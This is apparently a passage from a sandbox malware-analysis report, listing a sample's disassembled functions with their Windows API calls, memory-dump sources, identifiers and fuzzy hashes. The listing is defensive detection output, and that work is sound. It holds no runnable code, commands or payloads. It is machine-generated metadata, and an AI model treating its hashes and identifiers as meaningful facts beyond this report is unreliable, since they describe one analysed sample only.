                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                          • API String ID: 3156913733-2180253247
                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                          Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: nsa
                                          • API String ID: 1716503409-2209301699
                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                          Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                          • String ID: HideWindow
                                          • API String ID: 1249568736-780306582
                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                          Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                          Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                          Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                          Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                          Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                          Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                          Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree
                                          • String ID:
                                          • API String ID: 3394109436-0
                                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                          Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                          Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                          Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                          Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                          Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                          Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID:
                                          • API String ID: 4115351271-0
                                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                          Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                          • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                          • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                          • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                          Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
